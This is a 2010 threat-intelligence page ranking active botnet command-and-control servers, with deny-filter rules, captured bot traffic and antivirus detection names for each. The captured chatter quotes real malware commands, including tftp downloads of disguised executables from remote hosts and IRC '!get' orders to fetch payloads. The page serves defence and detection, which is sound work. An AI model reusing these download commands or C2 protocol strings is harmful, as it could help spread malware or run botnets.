Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Tue Feb 9 08:47:03 2010

10 Day Filter Set      30 Day Filter Set      

Priority 100 TCP Ports 80 80 218 80 91 80 88 Filter deny ip host 213.219.245.212 any log ! 438 infects 08/13/09 to 02/08/10 eastweb.ru ISP hosting and colocation services
Clients 438 russian federation Activity Domain eastweb.ru
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
  • Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Korgo.9359.B
AntiVirKorgo.X
AuthentiumKorgo.W
Avast_Korgo-T
AVGPadobot.W
BitDefenderKorgo.W
CAT-QuickHealKorgo.X
ClamAVKorgo.Y
DrWebLsabot
eSafePadobot.gen
eTrust-VetKorgo.AB
EwidoDropper.Paradrop.a
FileAdvisorMISSED
FortinetKorgo.K!worm
F-ProtKorgo.W
F-SecurePadobot.gen
IkarusKorgo.K
KasperskyPadobot.gen
McAfeeKorgo.ab
MicrosoftKorgo.AB
NOD32v2Korgo.Y
NormanKorgo.Y
PandaKorgo.AY.worm
Prevx1KORGO.W
RisingKorgo.x
SophosKorgo-K
SunbeltMISSED
SymantecKorgo.X
TheHackerKorgo(2).gen.pack
TrendMicroMISSED
VBA32Padobot.gen
VirusBusterKorgo.AB
Webwasher
Gateway
Korgo.X
Priority 100 TCP Ports 2081 9890 9890 66 Filter deny ip host 66.252.13.214 any log ! 204 infects 08/14/09 to 11/03/09 louisianadynamics.com ISP gigenet
Clients 204 united states Activity Domain louisianadynamics.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR Win15763.exe
  • Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
  • Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
  • Client: JOIN ##S## J
  • Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
  • Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirTRCrypt.TPM.Gen
AuthentiumHeuristic-210!Eldorado
AvastMISSED
AVGRBot.DN
BitDefenderMemScan_Backdoor.RBot.XYL
CAT-QuickHealBlack.a
ClamAVPacked-142
DrWebPacked.650
eSafeMISSED
eTrust-VetForBot.WP
EwidoMISSED
FileAdvisorMISSED
FortinetPacked.2D18!tr
F-ProtHeuristic-210!Eldorado
F-SecureKolab.arp
IkarusKolab
KasperskyKolab.arp
McAfeeMISSED
MicrosoftWootbot.gen
NOD32v2MISSED
NormanMalware.DQWL
PandaMISSED
Prevx1MISSED
RisingUndef.blt
SophosMalGeneric-A
SunbeltKolab.arp
SymantecSpybot.Worm
TheHackerBehav-Heuristic-064
TrendMicroBKDR_SDBOT.FOG
VBA32Wootbot
VirusBusterAgobot.WPUZ
Webwasher
Gateway
MISSED
Priority 100 TCP Ports 65520 65520 68 65520 193 65520 218 Filter deny ip host 88.198.228.238 any log ! 123 infects 12/04/09 to 02/03/10 your-server.de ISP hetzner
Clients 123 germany Activity Domain your-server.de
Chatter Example
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: NICK yaapulwgUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG yaapulwg :!get...
  • Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRFraudPack.aefn
AuthentiumMISSED
Avast_Malware-gen
AVGMISSED
BitDefenderMISSED
CAT-QuickHealFraudPack.aefn
ClamAVMISSED
DrWebFakealert.8143
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetFraudPack.AEFN!tr
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusFakeAV
KasperskyFraudPack.aefn
McAfeeSuspect-1B!357486DAE775
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaTrjZlob.KH
Prevx1MISSED
RisingMISSED
SophosMalEncPk-KH
SunbeltGeneric!BT
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterDR.Agent.RFTA
Webwasher
Gateway
MISSED
Priority 97 TCP Ports 3305 Filter deny ip host 92.240.234.164 any log ! 94 infects 09/07/09 to 02/08/10 lightstorm.sk ISP lightstorm communications s.r.o
Clients 94 slovakia Activity Domain lightstorm.sk
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 211.20.222.150 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 211.20.222.150 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
  • Server: :hub.2702.net 001 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7b
  • Server: :hub.2702.net 302 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.AOLW
BitDefenderGeneric.Mydoom.F72197F1
CAT-QuickHealAgent.gen
ClamAVMISSED
DrWebHLLW.Piabot.origin
eSafeMISSED
eTrust-VetIRCBot.PJ
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.gza
IkarusExploit.MS06040
KasperskyKolabc.gza
McAfeeSpybot.worm!l
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanAtraps.MQB
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalBehav-004
SunbeltMISSED
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroSPYBOT.BIM
VBA32MISSED
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 90 TCP Ports 65520 65520 91 65520 213 Filter deny ip host 218.93.205.30 any log ! 87 infects 09/09/09 to 12/19/09 163data.com.cn ISP chinanet jiangsu province network
Clients 87 china Activity Domain 163data.com.cn
Chatter Example
  • Server: GET /include/lib.js HTTP/1.0Accept: */*Referer:...
  • Server: GET /dspa/hcimages/nonadult/generic_search/main.jpg...
  • Client: NICK xmpunysoUSER a020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG xmpunyso :!get http:/pozemle.cn/in/so.txt:u. PRIVMSG...
  • Server: GET /in/so.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /hc3.asp HTTP/1.1Accept: */*Accept-Language:...
  • Server: GET /include/lib.js HTTP/1.1Accept: */*Referer:...
  • Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET...
  • Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET...
  • Server: GET /blank.htm HTTP/1.1Accept: */*Referer:...
  • Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /?param1={KeyWord:Oakland%20Material%20Handling}...
  • Server: + 1) == (name + \\'=\\')) { cookieValue =...
  • Server: PONG :i.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMomibot
KasperskyMISSED
McAfeeMISSED
MicrosoftMomibot.gen!B
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingGeneric.51F24BA7
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 59 TCP Ports 65520 65520 88 65520 218 Filter deny ip host 193.104.94.11 any log ! 57 infects 11/05/09 to 01/31/10 ipaper.com ISP block for pi assignments
Clients 57 united kingdom Activity Domain ipaper.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 110.14.214.164 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 110.14.214.164 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK muyzvqvrUSER w020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG muyzvqvr :!get...
  • Client: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erku.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /p1023/2.0/d.bin?pw1022161323 HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: GET /files/logo.gif HTTP/1.0Accept: */*Referer:...
  • Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRClick.VB.dic
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyTrojan-Clicker.VB.dic
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 48 TCP Ports 65520 65520 218 Filter deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09 - ISP group vertical ltd
Clients 47 russian federation Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 116.126.26.100 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 116.126.26.100 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK xdsexzfyUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebDownLoad.47549
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 35 TCP Ports 65520 65520 83 Filter deny ip host 218.93.201.51 any log ! 34 infects 12/26/09 to 02/08/10 163data.com.cn ISP chinanet jiangsu province network
Clients 34 china Activity Domain 163data.com.cn
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 110.12.207.146 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 110.12.207.146 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK qnqaacxfUSER t020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG qnqaacxf :!get...
  • Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erku.txt?t=0.6612011 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /sv/pm.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /winrar.exe?t=0.5138667 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /w.txt?t=0.5894679 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /banner.exe?t=0.774838 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET / HTTP/1.0Accept: */*Accept-Language: en-usReferer:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.ULPM.Gen
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealVirTool.DelfInject.gen!X.4
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusSopiclick
KasperskyMISSED
McAfeeMISSED
MicrosoftSopiclick.A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32SScope.Trojan-Downloader.072
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 26 TCP Ports 16667 Filter deny ip host 66.252.13.212 any log ! 26 infects 08/23/09 to 11/13/09 louisianadynamics.com ISP gigenet
Clients 26 united states Activity Domain louisianadynamics.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tracker.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
  • Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
  • Client: USERHOST [USA]2K-SP2[00]6761
  • Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn\\'t resolve your...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Client: USERHOST [USA]2K-SP2[00]0046
  • Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumBackdoor2.DKQM
Avast_Virtob
AVGVirut
BitDefenderGeneric.127971
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebHLLW.MyBot
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtBackdoor2.DKQM
F-SecureVirut.av
IkarusVirTool.DelfInject
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanAgent.LSMS
PandaVirutas.FG
Prevx1MISSED
RisingMnless.akf
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 23 TCP Ports 4545 8585 Filter deny ip host 69.42.218.70 any log ! 23 infects 12/01/09 to 12/10/09 likeacyb.org ISP awknet communications llc
Clients 23 united states Activity Domain likeacyb.org
Chatter Example
  • Client: USER mmsnbl mmsnbl mmsnbl :zrgsgbcjtqojqmvg
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: NICK gLMYNsE
  • Server: :irc.priv8net.com NOTICE AUTH :*** Couldn\\'t resolve your...
  • Client: MODE gLMYNsE +xi
  • Client: JOIN ##nerds## USERHOST gLMYNsE
  • Server: :gLMYNsE!mmsnbl@28B83DC7.401D014A.D1CD3454.IP JOIN...
  • Client: MODE ##NERDS## +smntu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 22 TCP Ports 7000 Filter deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09 keymachine.de ISP keyweb ag ip network
Clients 22 germany Activity Domain keymachine.de
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR coder.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
  • Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
  • Server: PONG :DD5EF013
  • Client: JOIN ##nzm##
  • Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
  • Client: PRIVMSG ##nzm## :\\002n\\002z\\037m\\037 (root.p\\037l\\037g)...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Agent.20480.AJY
AntiVirTRDropper.Gen
AuthentiumMISSED
AvastMISSED
AVGDropper.Generic.AVFT
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebPoison.767
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusTrojan-Ransom
KasperskyTrojan-Ransom.SMSer.in
McAfeeMISSED
MicrosoftVirTool_Injector.gen!Y
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32Rbot.afvq
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 17 TCP Ports 6900 Filter deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09 - ISP mostelecom-customer
Clients 17 russian federation Activity Domain -
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR utilmgr.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
  • Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
  • Server: PONG :4FE4D7D7
  • Client: JOIN ##!X4
  • Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGIRCBackDoor.SdBot4.NNI
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolab.eay
IkarusKolab
KasperskyKolab.eay
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroKOLAB.DW
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 12 TCP Ports 6556 6556 194 Filter deny ip host 194.109.11.65 any log ! 12 infects 09/06/09 to 12/23/09 xs4all.net ISP xs4all ppp _30 router subnets
Clients 12 netherlands Activity Domain xs4all.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: JOIN #9# g3t0u7
  • Client: MODE tein +i
  • Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
  • Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
  • Client: JOIN #9# g3t0u7
  • Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
  • Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.20959
AntiVirCodbot.BG
AuthentiumSdbot.LHJ
Avast_CodBot-P
AVGGeneric.GFM
BitDefenderCodbot.AG
CAT-QuickHealMISSED
ClamAVStration.QR-1
DrWebIRC.Moto
eSafeStration
eTrust-VetToxbot.AO
EwidoCodbot.ag
FileAdvisorMISSED
FortinetSpyBot.ZI!dam
F-ProtSdbot.LHJ
F-SecureCodbot.bn
IkarusCodbot.bn
KasperskyCodbot.bn
McAfeeProxy-FBSR
MicrosoftCodbot
NOD32v2Codbot
NormanCodbot.BG
PandaCodbot.BC.worm
Prevx1MISSED
RisingCodbot.l
SophosMalIRCBot-B
SunbeltMISSED
SymantecToxbot
TheHackerBackdoorCodbot.ag
TrendMicroTROJ_PROXY.DK
VBA32Codbot.ag
VirusBusterCodbot.W
Webwasher
Gateway
Codbot.20959
Priority 10 TCP Ports 65520 65520 91 Filter deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09 - ISP fr-ovh
Clients 10 france Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 114.203.72.50 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 114.203.72.50 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK lejfnledUSER e020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusHostil
KasperskyMISSED
McAfeeMISSED
MicrosoftHostil.F
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalEncPk-IF
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 10 TCP Ports 3305 Filter deny ip host 200.49.145.197 any log ! 10 infects 09/04/09 to 01/23/10 allytech.com ISP allytech s.a
Clients 10 argentina Activity Domain allytech.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 173.16.120.174 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 173.16.120.174 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
  • Server: :hub.49011.net 001 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frj
  • Server: :hub.49011.net 302 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.BBMT
BitDefenderGeneric.Mydoom.638E6D7B
CAT-QuickHealI-Kolabc.gza
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetKolabc.GZA!im
F-ProtMISSED
F-SecureKolabc.gza
IkarusKolabc
KasperskyKolabc.gza
McAfeeMISSED
MicrosoftKolabc.C
NOD32v2MISSED
NormanAkbot.BJT
PandaGaobot.OXI.worm
Prevx1MISSED
RisingDropper.Undef.GEN
SophosMalBehav-104
SunbeltGeneric!BT
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroKOLABC.GB
VBA32Kolabc.gza
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 9 TCP Ports 10324 Filter deny ip host 67.43.236.67 any log ! 9 infects 08/17/09 to 12/28/09 - ISP nader dara
Clients 9 lebanon Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 194.126.184.69 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 194.126.184.69 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER oqrpxi oqrpxi oqrpxi :uwcnesiidwfjpyko
  • Client: NICK gEJwHkFa
  • Client: MODE gEJwHkFa +xi
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
  • Client: JOIN #las6 USERHOST gEJwHkFaMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 gEJwHkFa #las6 :You\\'re not channel operator
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirVanBot.AX.116
AuthentiumMISSED
Avast_SdBot-4142
AVGGeneric_c.VB
BitDefenderAgent.YRG
CAT-QuickHealVanBot.ax
ClamAVPUA.Packed.Expressor
DrWebIRC.Sdbot.945
eSafeVanBot.ax
eTrust-VetLinkbot.OC
EwidoVanBot.ax
FileAdvisorMISSED
FortinetVanBot.AX!tr.bdr
F-ProtMISSED
F-SecureVanBot.ax
IkarusAgent.YRG
